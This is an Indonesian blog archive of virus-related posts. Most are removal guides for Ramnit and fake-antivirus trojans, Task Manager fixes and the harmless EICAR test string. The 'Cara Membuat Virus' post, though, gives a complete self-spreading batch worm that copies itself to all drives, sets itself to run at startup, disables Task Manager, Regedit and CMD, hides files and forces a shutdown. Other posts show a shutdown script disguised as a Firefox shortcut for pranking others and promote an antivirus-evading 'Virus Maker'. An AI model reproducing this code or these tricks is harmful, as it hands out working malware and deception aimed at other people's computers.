Tampilkan postingan dengan label Virus. Tampilkan semua postingan
Tampilkan postingan dengan label Virus. Tampilkan semua postingan

23 November 2011

Menghapus virus Ramnit shortcut 1 - 4 dan trojan Xp security 2011 memakai Dr Web dan antivir (Avira)

ahun 2011 ini muncul 2 virus dan trojan yang sangat kuat dan susah menghapusnya, yang jelas virus dan trojan ini membuat kita kalang kabut karena bikin eror. mereka adalah :
1. Virus Ramnit shortcut 1 - 4
2. Trojan Xp security 2011

Virus ramnit ini menyebar melalui flash disk , dengan ciri-ciri ada shortcut 1 - 4.ink didalam flash disk kita, flash disk yang sudah terinfeksi akan dengan mudah menginfeksi komputer lain tanpa perlakuan khusus, cukup dengan di tancapkan melalu USB, maka virus ini akan langsung masuk. smadav 8.
7 smp sekarang bahkan blm bisa menanganinya. tapi menggunakan dr web dan antivir terbaru, virus ini benar2 bisa di bersihkan.
silahkan download
 
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
Folder Recycler yang di dalamnya berisi banyak file-file yang tak diketahui apa fungsinya.

saya yakin flashdisk saya bersih dari Virus apapun, logikanya adalah : flashdisk saya sudah di susupi virus dari komputer yang dibawa kedua orang tersebut.

segera saya buka notebook saya, browsing ke internet, cari informasi yang bisa menjelaskan Fenomena Aneh Virus Flashdisk ini.

Dan Akhirnya saya menemukan jawabannya : Virus W32/RAMNIT dan variantnya.

Virus Ramnit atau biasa dinamai ShortCut Recycler dan 
Win32.Siggen.8 adalah sejenis trojan/backdoor, dan keganasannya bikin jengkel banyak praktisi Komputer, bahkan disebut-sebut mendekati kemampuan Sality yang saya sendiri mengakui memang bikin jengkel. Virus ini menginject file Exe, DLL, SCR, Html dan file-file executable lainnya di Windows Environtment.

Salah satu ciri khas virus ini adalah keluarnya file  Copy of Shortcut to (1 s/d 4).lnk di flashdisk yang dicolokkan ke komputer yang sudah terjangkit virus ini. Selain itu, terdapat sebuah file bernamawatermark.exe di C:\Programs Files\Microsoft\ dan  C:\Program Files\Common Files\Microsoft\

melihat kemiripan dengan Sality tersebut, penulis mencoba menggunakan Smadav terbaru untuk mendeteksi keberadaan virus tersebut di komputer terdakwa, dan, lagi-lagi Smadav mandul belum bisa mendeteksi virus yang satu ini, padahal menurut informasi, virus ini telah hadir sejak tahun 2010 (Variant A). 

Sedangkan trojan XP security 2011, adalah trojan yang menyamarkan dirinya, seolah2 dia adalah antivirus dari microsoft khusus untuk Windows XP, bahkan ada progres bar saat scan file, tapi itu hanya lah tipuan (fake) sehingg diberi nama trojan fake alert.



Xp scurity 2011 bisa masuk ke dalam Security center windows dan menghilangkan windows firewall dan windows update. trojan ini akan keluar terus menerus saat komputer di hidupkan sehingga membikin komputer lemot dan kadang membuat koneksi internet kita masuk kessitus2 porno.
 
cara menghapus virus ramnit atau trojan Xp security ini jg sangat mudah memakai dr Web. Langkah2 nya sebagai berikut :
1. Download dr web yang clean dari website tadihttp://www.freedrweb.com/download+cureit/ di komputer yang bersih, kemudian copy ke komputer yang terinfeksi. Lebih bagus lagi file tersebut di burning ke dalam CD, untuk menutup kemungkinan filenya terinfeksi virus.
2. double klik file dr web ini, maka anda akan masuk halaman EPM (enhance protection mode) , pilih Ok dan seterusnya hingga masuk ke dalam halaman expess scan. Pilih mode tersebut dahulu, untuk menscan memory aktif komputer.

3. Setelah scan selesai, biasanya file yang terdeteksi akan segera di hapus oleh dr web, segera restart komputer anda (biasanya opsi dari dr web ketika di close).
4. Setelah hidup kembali, komputer anda sudah bersih dari virus ramnit atau xp securty 2011 yang aktif, tp msh ada kemungkinan masih ada dikomputer anda, sebaiknya segera discan kembali .
5. Anda bisa scan kembali dengan dr web (mode complete scan), sampai selesai. kemudian disarankan juga menggunakan antivir.
6. Instal antivir dari download di situsnya http://www.avira.com/en/avira-free-antivirus   . Kemudian double klik di taaskbar bawah kanan untuk masuk ke halaman antivir.
7. klik tab 'Local protection' di sebelah kanan, kemudian pilih 'complete system scan', untuk membersihkan sisa2 virus dan trojan yang ada
8. Terakhir , aktifkan selalu antivir, karena antivir yang terbaru (saat ini mei 2011), sudah bisa memblok ramnit yang masuk dan xp scurity 2011 yang masuk lewat flash disk.



Notebook : Jangan sekali-kali mencolok handphone berbagai merk ke komputer yang bervirus karena 
Virus ini kadang-kadang membuat hang atau leg handphone anda dan biasa nya virus itu membuat shortcut , file Autorun.inf dan Folder Recycler di Kedua memory yaitu Memory handphone dan Memory External.
Jadi yang Penguna Handphone harus Hati-hati yaa...... :-)
Sekian dulu postingan saya.......

16 Oktober 2011

Download Anti Virus Shortcut Remover 2011 | Antivirus Software Untuk menghapus Virus Shortcut Terbaik










Terkadang kita akan di jengkelkan oleh virus yang namanya shotcut yang selalu otomatis membuat folder sendiri khususnya di system Operasi Windows.
buat kamu yang pengen membasmi masalah pada komputer kamu saya sarankan menggunakan software yang satu ini, ada banyak kelebihan dalam software lite antivirus, kenapa begitu? karena ukurannya yang kecil tapi khasiatnya sangat besar sekalin dan sangat membantu kompi kita bila terserang virus shortcut.
Dengan menggunakan software permbasmi virus shortcut maka komputer kamu akan terasa lebih enak dipakai dan tidak terganggu.







Password: www.niamblog.com

30 Juli 2011

Pengalaman membasmi virus shortcut, W32 Ramnit


Beberapa hari yang lalu komputer tetangga saya bermasalah, karena setelah dimasukkan USB Flashdisk, selalu muncul empat buat shortcut, yaitu Copy of Shortcut to (1).lnk sampai Copy of Shortcut to (4).lnk. Tidak hanya sampai disitu, beberapa program atau aplikasi yang biasa digunakan tiba-tiba tidak bisa dijalankan, sehingga dugaan saya komputernya terkena virus.

Sebenarnya komputer tersebut sudah di install Antivirus, ketika itu menggunakan Avira Antivir Personal. Tetapi karena penggunanya masih anak kecil, sehingga kurang perhatian (belum tahu) akan pentingnya update antivirus, termasuk ketika menjalankan program dari flashdisk.
Segera saya menyiapkan update manual Avira Antivir yang ternyata saat ini ukurannya cukup besar, sekitar 43 MB. Alhamdulillah update manual Avira berhasil dan Avira juga masih bisa berjalan normal. Setelah itu langsung saja saya lakukan Full Scan Hardisk. Setelah selesai, ternyata memang ditemukan banyak file yang terinfeksi virus, W32/Ramnit.C ( virus Ramnit varian C yang menginfeksi file windows 32 bit).

File-file yang terinfeksi virus adalah exe, dll dan juga HTML yang merupakan file-file penting, terutama exe dan dll, karena biasanya merupakan file program atau aplikasi yang biasa kita gunakan. Untuk berjaga-jaga maka semua file yang terinfeksi saya masukkan ke karantina, siapa tahu di internet ada tools untuk memperbaiki file yang terinfeksi virus tersebut.
Setelah googling mencari informasi tentang virus Ramnit.C ini, ternyata belum menemukan tools atau program yang dapat digunakan untuk memperbaiki file yang terinfeksi virus. Sehingga terpaksa mencari solusi lain sampai kemungkinan install ulang windows, karena program atau aplikasi menjadi rusak dan tidak bisa dijalankan.

Install Ulang Windows, Repair atau … ?

Pada awalnya saya memutuskan untuk install ulang windows-nya saja, karena banyaknya file exe dan dll yang terinfeksi. Selain itu windows akan lebih fresh dan tidak perlu perbaikan-perbaikan sistem lagi. Hal itu mungkin benar, tetapi karena banyaknya program yang sudah di install di komputer membuat saya berfikir ulang, karena setelah install windows, harus menginstall driver dan masih harus menginstall berbagai aplikasi-aplikasi lainnya, jadi cukup memakan waktu dan belum tentu semua program ada masternya.
Alternatif berikutnya adalah me-repair (memperbaiki) installasi windows. Tetapi sebelumnya saya coba memeriksa hasil scan avira, file-file atau program apa saja yang terinfeksi virus. Dengan melihat lokasinya, ternyata tidak semua program terinfeksi, hanya aplikasi-aplikasi yang sering digunakan saja dan beberapa driver komputer. Dan saya lihat sebagian besar file sistem windows masih aman, hanya aplikasi seperti windows media player yang juga terinfeksi. Sehingga sepertinya tidak perlu repair windows.
Selanjutnya program yang exe atau dll-nya terinfeksi saya uninstall kemudian di install ulang, dengan bantuan revo uninstaller. Termasuk install ulang beberapa driver yang sudah terinfeksi. Setelah semuanya beres, saya ulangi scan windows dengan avira dan hasilnya tidak ada lagi yang terinfeksi, dan pogram-program lainnya juga sudah berjalan lancar.

Kesimpulan/Pelajaran

Beberapa kesimpulan atau pelajaran yang bisa diambil antara lain :
  • Senantiasa update antivirus yang kita gunakan, paling tidak seminggu sekali. Jika memungkinkan update setiap hari.
  • Hati-hati ketika menjalankan aplikasi dari flashdisk, periksa terlebih dahulu akan adanya file yang mencurigakan
  • Matikan fitur Autorun atau Autoplay pada Windows
  • Jika sudah terkena virus, coba update antivirus yang digunakan dan jika berhasil, lakukan full scan
  • Cek kemungkinan untuk memperbaiki komputer tanpa harus install ulang, apalagi jika komputer sudah terpasang program/aplikasi yang sangat banyak
Selain menggunakan Avira, beberapa blogger juga menulis sukses membasmi virus ini dengan Antivirus Avast yang diupdate dengan update terbaru. Selain itu. mengingat bahwa virus ini sebenarnya sudah banyak beredar beberapa bulan yang lalu, sebagian besar antivirus yang sudah diupdate seharusnya sudah mempu mendeteksi dan membasmi virus ini.
Selain itu, teknik penyebaran melalui shortcut ini mulai banyak digunakan oleh virus/worm sejak ditemukan celah keamanannya (baca : celah keamanan windows melalui shortcut ). Jika ingin tahu lebih detail tentang virus Ramnit ini, bisa membaca salah satu artikel ini : W32/Ramnit (Vaksin.com)

16 Desember 2010

10 Jenis Virus Komputer Berbahaya Tahun 2010

1.Autoit Variant ==> Hampir kebanyakan varian dari virus import berbasis script ini menggunakan icon mirip seperti folder. Virus ini memiliki kemampuan untuk melakukan auto update ke beberapa situs, seperti yang dilakukan oleh salah satu variannya, Autoit.CA, yang banyak dilaporkan. Ia juga dapat memanfaatkan Yahoo! Messenger sebagai media perantara penyebarannya dengan mengirimkan pesan berisi link ke setiap contact person yang ada di YM korban.
clip_image002
2.Recycler ==> VarianYang menjadi ciri khas dari virus ini adalah teknik bagaimana ia menyebar. Yakni “ngumpet” dalam direktori Recycler/Recycler/Recycle Bin. Ia juga diketahui menerapkan teknik code injection agar kode virus bisa “nyangkut” pada explorer.exe. Ini dilakukannya untuk mempersulit user maupun program antivirus sekalipun untuk membunuhnya.
clip_image002[4]
3.Valeria.C. ==> Virus lokal yang satu ini, lagi-lagi dibuat menggunakan Visual Basic, dan sepertinya ada kemiripan dengan virus Aksika, bisa jadi ia merupakan versi modifikasi dari virus Aksika. Virus ini menyamar menggunakan icon mirip folder, dengan ukuran file sekitar 152KB tanpa di-pack. Pada komputer terinfeksi, akan ditemukan beberapa file yang mirip sekali dengan folder padahal itu adalah virus. Diketahui, pada setiap root drive, ia akan membuat sebuah folder dengan nama valerianet yang berisi file virus. Untuk mengetahui apakah komputer sudah terinfeksi virus ini apa belum, cukup mudah. Komputer terinfeksi ditandai dengan terdapatnya file dengan nama valeria.txt di C:\.
clip_image002[6]
4.Fdshield ==> Virus yang dibuat menggunakan bahasa Delphi ini menggunakan icon yang menyerupai Internet Explorer. Memiliki ukuran file sebesar 553.472 bytes, tanpa di-pack. Satu hal yang mencolok dari virus ini adalah dari nama yang digunakan saat menyebar, yang bertuliskan “17++ Sexs & Rahasia Wanita artis Indonesia (foto2_kamera tersembunyi_liputan).exe”. Bagi user yang tidak hati – hati, akan menyangka file tersebut merupakan file HTML. Jika Anda lihat pada direktori C:\Windows\System32, akan ditemukan sebuah file induk dengan nama “rundl32.exe”. Jangan tertipu lagi! Itu bukanlah file bagian dari Windows, tapi itu memang adalah file virus. Perhatikan huruf “L” yang cuma satu. Dan sekarang lihat pada Schedule Task, ada Job baru dengan nama “Windows FD Shield” yang akan mengeksekusi file virus diwaktu yang telah ia tentukan.
clip_image002[8]
5.WSar.D ==> Seperti varian sebelumnya, ia masih dibuat menggunakan VB. Varian ini memiliki ukuran sekitar 108KB, murni tanpa di-pack. Karena icon yang digunakan adalah icon mirip folder, saat beraksi, ia akan mencari folder pada setiap drive yang ada di komputer korban, dan membuat duplikat dirinya dengan nama sama seperti folder asli.
clip_image002[10]
6.Purwo Variant ==> Satu lagi varian baru, Purwo.C, masih dibuat menggunakan Visual Basic, dengan badan berukuran sekitar 56KB, murni tanpa di-pack. Virus ini menggunakan icon mirip dokumen Word milik MsOffice untuk menipu calon korbannya. Saat menginfeksi ia menciptakan sebuah folder dengan nama “Purwokerto Under Cover” yang diberi attribut hidden, dan berisi sebuah file bernama “KoruptorPurwokerto.exe” pada setiap drive yang ia temukan. Di dalam folder C:\Windows\System32\system juga ada file windowss.exe, dan di C:\Windows\javaa\service.exe. Di waktu tertentu ia akan menampilkan layar hitam yang berisi teks pesan dari pembuatnya. Dan hati-hati, virus ini juga akan menghapus beberapa file milik Anda yang ia temui.
clip_image002[12]
7.Yuyun.vbs ==> Virus yang diciptakan menggunakan Visual Basic Script ini berukuran sekitar 9KB. Pada komputer terinfeksi ia akan membuat banyak sekali file duplikat di setiap folder yang ia temukan dengan nama file autorun.inf, Thumb.db, dalam kondisi ber-attribut hidden, dan sebuah shortcut dengan nama Microsoft. Jika shortcut tersebut diakses, dia memang akan menuju ke suatu folder, tapi dibalik itu virus tersebut juga akan aktif. File Thumb.db disini juga bukan merupakan file milik Windows, tapi melainkan file script virus. Pada komputer terinfeksi juga akan ditemukan sebuah file pesan virus pada direktori Temp user. Di direktori ini juga akan ditemukan file lain yakni script virus yang sudah dalam kondisi ter-decrypt. Karena perlu Anda ketahui bahwa virus ini memang hadir dalam kondisi ter-enkripsi.
clip_image002[14]
8.Raider.vbs Variant ===> Virus jenis VBScript ini jika file virusnya dibuka dengan Notepad, tidak banyak string yang bisa dibaca karena dalam kondisi ter-enkripsi. Ini sudah menjadi kebiasaan dalam setiap variannya. Biasanya, pada Registry, ia akan memberikan pengenal dengan membuat key baru di HKLM\Software dengan nama sama seperti nama pada computer name, dengan isinya berupa string value seperti nama virus tersebut, Raider, serta tanggal komputer tersebut kali pertama terinfeksi.
clip_image002[16]
9.Malingsi ==> Virus bertubuh gemuk dengan ukuran 705.312 bytes ini dibuat menggunakan Visual Basic yang di-pack menggunakan PECompact. Sepertinya virus ini ditujukan untuk menyerang virus lain, ini terlihat dari pesan yang ada di tubuhnya. Virus ini berkembang biak dan menyebar menggunakan perantara mIRC, yang bertindak sebagai Bot.
clip_image002[18]
10.Rieysha Variant ==> Ditemukan lagi varian dari Rieysha, kali ini dengan nama Rieysha-Sma. Seperti varian sebelumnya, ia masih dibuat menggunakan Visual Basic. Ukuran kali ini sekitar 104KB, dengan icon yang menyerupai file Real Media Player. Saat menginfeksi, ia akan membuat duplikat file exe, mp3, doc, dan 3gp yang digantikan dengan dirinya. Selain itu, setidaknya ada 2 buah file virus pada root drive, dengan nama “sma3gp.exe” dan “CeritaSeru.vbs”.
clip_image002[20]

Sumber : http://www.kaskus.us/showthread.php?t=2567009

Mengaktifkan Kembali Task Manager yang Tidak Bisa Dibuka Karena Virus

image Virus lokal seringkali setelah dibersihkan masih meninggalkan sisanya seperti Task Manager yang tidak bisa dibuka. Saya akan menjelaskan bagaimana mengaktifkan kembali Task Manager
Buka notepad.
Ketik code berikut ini di notepad.
[Version]
Signature=”$Chicago$”
Provider=mailplus
[DefaultInstall]
DelReg=del
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr

Simpan file tersebut dengan nama “aktifkan.inf” (ketik tanpa tanda kutipnya).
Buka Windows explore dan jalankan file yang telah anda simpan dengan cara klik kanan » Install.

Contoh String Virus Untuk Menguji Kemampuan Antivirus Anda

Apakah anda yakin dengan kemampuan antivirus yang terinstall pada komputer anda. Jika anda belum yakin maka anda bisa melakukan tes sederhana untuk menguji kemampuan antivirus anda. EICAR adalah string sederhana yang uyang menjadai salah satu database dari antivirus berstandar Internasional. Jika antivirus yang kita gunakan mampu mendeteksi string EICAR sebagai virus maka secara sederhana antivirus kita memiliki kemampuan basic antivirus yang baik.
Berikut langkah-langkah yang bisa kita lakukan unyuk membuat string EICAR dan menguji Antivirus kita.
1. Buka program Notepad, kemudian copy paste kode berikut:
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Penting, kode harus ada dalam 1 baris.
image 2. Kemudian save File yang anda buat dengan nama checkantivirus.com. Save As Type isi dengan All Files
image
3. Double klik file yang anda buat, maka jika Antivirus anda mendeteksi sebagai virus berarti antivirus anda cukup bagus. image Catatan:
String yang dibuat tidak membahayakan komputer anda

15 November 2010

Tips dan Trik Membasmi Virus

Membasmi virus tanpa antivirus? Gimana

caranya tuh? jawabannya gampang
Simak langkah-langkah umum berikut
dalam membasmi virus:

1. Nonaktifkan System Restore.
Fasilitas System Restore pada Windows
berguna untuk mengembalikan konfigurasi sistem ke
konfigurasi sebelumnya. Agar sistem yang telah pulih
tidak kembali rusak, matikan fasilitas ini dengan klik
kanan pada My Computer dan pilih Properties. Lalu pilih tab System Restore dan centang bagian
Turn off System Restore on All Drive.


2.Matikan proses virus.
Bagaimanapun caranya, matikan proses virus. Biasanya proses virus memiliki ikon berupa
folder atau dokumen MS Word. Gunakan aplikasi seperti Process Explorer, Pocket Killbox, Show Kill
Process, The Killer Machine, dan sebagainya.


3. Pulihkan registry.
Pulihkan registry yang telah diotak-atik oleh virus. Jika tidak, maka virus dapat menginfeksi
komputer Anda lagi. Gunakan Hijack This, Registry Cleaner, atau The Killer Machine. Hapus juga
entry Scheduled Task yang dibuat oleh virus jika ada.


4. Hapus file-file virus.
Gunakan fasilitas Search pada Windows untuk menemukan file-file virus.


5. Munculkan file-file yang disembunyikan virus.
Virus pada umumnya tidak begitu kejam dengan menghapus dokumen-dokumen kita.
Biasanya file-file tersebut hanya disembunyikan. Gunakan perintah attrib -s -h pada Command
Prompt untuk memunculkannya kembali.


6. Saran terakhir untuk pencegahan.
Hati-hatilah saat melakukan transfer data baik melalui disket, USB Flash Disk, maupun dari
jaringan. Tunjukkan file hidden dan ekstensi file pada Windows Explorer. Selain itu, jangan mudah
tergoda oleh file-file dengan nama yang menggoyahkan iman

22 Oktober 2010

Meng-enable-kan Windows Task Manager saat Terserang Virus

Seringkali ketika komputer terkena Virus ada beberapa aplikasi windows yang tidak dapat di akses seperti Regedit, Folder Options & Task Manager. Hal itu tentu sudah sangat merugikan bagi kita mengingat semua fitur tsb sangat di butuhkan ketika komputer sedang mengalami masalah.

Disini saya selaku penulis akan memberikan sedikit tips agar salah satu dari aplikasi di atas dapat dijalankan. Kali ini kita akan membahas mengenai Task Manager. Windows Task Manager merupakan sebuah Program Aplikasi yang menampilkan informasi detail tentang aplikasi yang sedang berjalan, penggunaan CPU, Informasi memory dll.


Windows Task Manager juga sering menjadi target incaran dari malware. Saking ganasnya malware tsb dapat memblokir aksesnya. Kebayangkan gimana kalau Task Manager dapat di jalankan. Ok..... disini kita akan mencoba untuk mengembalikan kembali Task Manager yang telah di Blokir oleh sang Malware tsb. Tarik nafas dalam-dalam hembuskan........ :)

1. Buka Run, dan tulis gpedit.msc



2. Arahkan ke User Configuration, Administrative Templates, System, Ctrl+Alt +Del Options



3. Disebelah kanannya , klikdua kali pada Remove Task Manager
4. Pilih Not Configured, lalu Ok



Seandainya cara ini tidak berhasil, kitaminta bantuan dari antivirus lain saja PCMAV misalnya, atau kalau belum berhasil juga.... Mungkin anda belum beruntung..Coba Lagi :)

13 Oktober 2010

Seharian pusing dengan komputer yang error... blogger-emoticon.blogspot.com buka Mozilla langsung nge-hang, window explore aja ndak mau jalan... Game kecil freecell aja tidak bisa. blogger-emoticon.blogspot.com

Padahal udah aku kasih payung merah (Avira) biar tidak kena hujan virus. Kucoba cek dengan masukin bebek kuning kecil (PCMAV) di dalam komputer, ternyata cuma detect doang...virusnya malah diajak ke warung karantina... blogger-emoticon.blogspot.com

Hardisk aku lepas, coba scan di komputer lain yang ada saudaranya Mc Donald (McAfee)... hasilnya mbradul ra karuan sistemnya. Mau coba yang segitiga ijo, klihatannya juga kurang begitu mangtaf...

Jurus terakhir yang ternyata paling jitu... INSTAL ULANGblogger-emoticon.blogspot.com
Bermodal CD original GTpro 2000 an... dan file backup yang ada di drive D, so masalah virus bisa diatasi.
Tidak pakai lama, hasilnya bersih sih sih sih.... sak isi isine hardisk...blogger-emoticon.blogspot.com wkkk 
 
Kesimpulannya bahwa, tidak ada yang bisa menjamin komputer tidak kena virus... Apapun antivirus yang sobat pakai kemungkinan kena sangat besar, apalagi komputer yang biasa digunakan untuk online. Analoginya kan penyakitnya dulu, baru obatnya. Virusnya dulu muncul, baru anti virusnya. Artinya antivirus akan mengenali dan bisa mengatasi virus-virus yang telah ada, kalau virus baru belum tentu bisa mengatasinya.

Sehingga alangkah baiknya menyimpan data tidak di drive C: atau drive yang digunakan untuk sistem. Backup driver komputer sobat, mungkin bisa menggunakan software drivermax, sehingga bila terjadi kerusakan atau kena virus, tinggal instal ulang, data penting tidak hilang termasuk drivernya.
Semoga bermanfaat

Jane aku yakin wis akeh sing do ngerti... blogger-emoticon.blogspot.com tapi nek ora di tunyuk tunyukke sok do lali.

12 Oktober 2010

Cara Cembuat Virus


Pada saat sekarang ini perkembangan dunia komputer semakin kompleks berikut dengan
perkembangan program-program didalamnya, dalam postingan saya kali ini saya akan nmemcoba mengulas tentang pembuatan program pengganggu atau yang lebih dikenal dengan sebutan VIRUS
Kebanyakan orang berpendapat bahwa membuat virus itu memerlukan penguasaan bahasa CC+,VBscript atau bahasa pemrograman lainya. wah kalau gitu caranya bisa bikin botak rambut tuh,hohoh
ok
Kali ini saya akan berbagi ilmu tentang cara membuat virus hanya dengan menuliskan program sederhana di sebuah notepad. bisakah?

jawabannya tentu saja bisa…...virus yang akan kita buat ini akan secara langsung mengacak-acak registry windows. Bahkan untuk antivirus tertentu dengan update terbaru pun tidak akan bisa mendeteksinya. Lumayan banget kan buat iseng,hoho tapi kalo ada apa-apa saya tidak bertanggung jawab ya. Maka dari itu gunakan saja tutorial ini sebagai tambahan pengetahuan dan jangan disalah gunakan zah.

Ok, langsung kita mulai saja :

1. Buat sebuah halaman notepad kosong yang terdapat pada windows anda. Start->All

Programs->Accessories->notepad
2.Buat script berikut :

//Listing program// >>baris ini jangan ikut ditulis

1. Echo off > C:\virxx.txt

2. if no exist C:\Windows\%0 copy %0 C:\Windows

3. for %%p in (A C D E F G H) do copy %0 %%p:

4. for %%q in (A C D E F G H) do dir %%q:\*.3gp /B /S >> C:\virxx.txt

5. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind

/t REG_DWORD /d 1 /f

6. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v

DisableTaskMgr /t REG_DWORD /d 1 /f

7. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v

NoFolderOptions /t REG_DWORD /d 1 /f

8. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v

ShowSuperHiden /t REG_DWORD /d 0 /f

9. for %%r in (A C D E F G H) do attrib +h +s %%r:\*.3gp /s

10. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun

/t REG_DWORD /d 1 /f

11. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v gorun /t REG_SZ /d

C:\Windows\virxx.bat /f

12. REG ADD HKCU\Software\Policies\Microsoft\Windows\System DisableCMD /t REG_DWORD /d

2 /f

13. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v

NoViewOnDrive /t REG_DWORD /d 4 /f

14. REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v

DisableRegedit /t REG_DWORD /d 1 /f

15. Shutdown -s -t 360 -c "Virus Menjangkiti Komputer Anda" -f

16. Exit





3. Simpan file ini dengan nama apa saja, tapi jangan lupa simpan dengan extensi .bat misalnya : virus.bat. Dan pada save as type nya pilih All Files.

4. kalian Bisa saja menambahkan atau mengurangi list script virus di atas. Asalkan kalian mengetahui dasar dasar registry windows.

5. Jika ingin computer ingin terkena bencana, silakan klik file yang telah anda buat tadi sekaligus untuk memastikan bahwa virus telah berjalan dengan baik. Tetapi jika tidak, ya jangan di klik

Sekedar informasi, virus ini jika bekerja akan menghilangkan task manager, run, regedit, folder option, dan akan menyembunyikan file yang berekstensi *.3gp dengan super hidden. Selain itu virus akan berkembang biak dengan mengkopykan dirinya ke drive A, C, D, E, F, G, dan setrusnya. pokoknya makyus dah.begitu kata pak bondan winarno..hoho



Selamat mancoba!

22 Agustus 2010

MEMBUAT VIRUS FACEBOOK


Cara iseng ngerjain temen di facebook – Nah salah satu cara buat ngerjain akun facebook orang, kita bisa membuat sebuah virus facebook. Istilah tepatnya sih bukan virus ini hanya menggunakan program notepad dengan sedikit kreativitas yang bakal membuat facebookers langsung shock dan kaget dengan apa yang mereka lihat.. Gimana sih cara buatnya ? This is simple .
How to make a fake facebook virus – method
1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2. Copy kode ini dan pastekan di notepad kamu
@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED BY SHADOWSMAKER IH-crew!!! PLEASE WAIT ………..”



3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi nama apa, misal :pacebuk.bat dan SAVE di Dekstop (Recommended)
4. Sekarang klik kanan desktopmu dan pilih New => Shortcut
5. Setelah ini akan muncul sebuah tampilan dan 
klik browse lalu cari lokasi file .bat yang kamu simpen tadi, misal tadi kamu save pada dekstop
6. Klik 
Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya sebagai tipuan aja)
7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah 
mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu 
klik kanan file .bat tadi dan pilih change icon :)
Gak nemu icon mozilla ? Coba deh low cari di 
Program Files => Mozilla Firefox
Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi .. Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet.. what will happen ? hahhaha ..
Ini sedikit screenshot yang bakal terjadi saat low ngeclik file .bat yang telah di modif jadi mozilla tadi :
resim
moga berguna gan :)
sumber : ShadowsMaker

2 Agustus 2010

Download Virus Maker 1.0 (Software Pembuat Virus)

Hey sob, apa kabar ? Bertemu kembali dengan gw. hehehe
Oke sob, kali ini Oke Blog akan menshare tentang software yang menurut Oke Blog sendiri cukup unik, keren, mantab, simple, dan bisa buat ngerjain temen kita. hehehe
Software ini adalah Virus Maker, software untuk membuat virus di Komputer. Keren kan sob, buat ngerjain temen-temen kita, hehehe


Sebelum menggunakan software ini baca dulu petunjuk khusunya :
1.Berdoalah sebelum menggunakan aplikasi ini supaya target tidak marah
dengan sobbat Blogger.
2.Taubat setelah menjahili teman yang sudah menjadi target.
3.Relakan komputer jika terjadi kerusakan yang berarti.

Dan baca juga Deskripsi Singkatnya :

Virus Maker 1.0 adalah sebuah aplikasi yang mampu membuat virus
berekstensi .vbs atau biasa disebut VBS Virus.

Aplikasi ini sangat mudah penggunaannya karena menggunakan antarmuka
yang sederhana.

Aplikasi ini juga tidak terdeteksi sebagai virus oleh antivirus luar
maupun lokal karena menggunakan teknik yang belum ada oleh Virus Maker
lain yang ada di Indonesia.

Aplikasi Virus Maker ini tidak merusak komputer kecuali file yang di
generate atau yang di hasilkan aplikasi ini adalah merusak komputer
dengan tingkat "Low".

Virus yang dihasilkan aplikasi ini tingkat kerusakannya tidak parah,
karena menggunakan teknik sederhana yang mampu mendisable Regedit atau
Task Manager dan tools penting Windows lainnya.

Dan ini gejala-gejala yang dapat ditimbulkan :
1.Membuat file .txt dengan judul sesuai yang pengguna isikan sewaktu
membuat virus.
2.Membuat file duplikat virus .vbs dengan judul yang sesuai yang
pengguna isikan sewaktu membuat virus.
3.Mendisable beberapa tools penting Windows, seperti Task Manager.
4.Membuat file autorun.inf pada semua drive (termasuk flash disk).
5.Sewaktu membuka drive akan ada peringatan bahwa file Windows Host
Script tidak ditemukan. Ini bisa di atasi dengan menghapus string
regisry berikut:
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\MountPoints2.
Hapus file MountPoints2 pada registry yang ada di Windows.

Oke, dan ini screenshotnya












Nah, sepeti biasa, buat yang langsung mau ke TKP silahkan download Software Virus Maker 1.0 lewat link di bawah ini

Download Virus Maker 1.0

29 Juli 2010

VIRUS BERBAHAYA MENGINCAR PONSEL SYMBIAN 2nd EDITION ANDA

Beware...!!! virus ponsel dimana -mana... hati - hati dalam menggunakan ponsel symbian kesayangan anda, karena saya melihat dengan mata dan kepala saya sendiri, sebuah ponsel sebut saja nokia 7610 terinveksi virus tidak dapat mengirimkan SMS sama sekali. Setelah terinfeksi kita akan dikirimi SMS bahwa ponsel kita telah dijangkiti virus dan kita disuruh untuk segera memperbaikinya ke conter ponsel terdekat. Lucu juga ya…? Yang membuat virus ini baik juga ya…? Tapi atas nama virus gak ada baiknya, yang pasti tugasnya untuk merusak system operasional dari ponsel tsb.
Tips aman dari virus ponsel :


Pastikan ponsel yang akan kirim/terima file adalah ponsel yang bebas dari virus, atau sekurang – kurangnya punya Antivirus yang selalu ter up to date.

Matikan Bluetooth setelah anda melakukan aktivitas pengiriman/penerimaan file via Bluetooth

Pilihlah anti virus yang benar – benar terpercaya dan signer dengan produsen ponsel

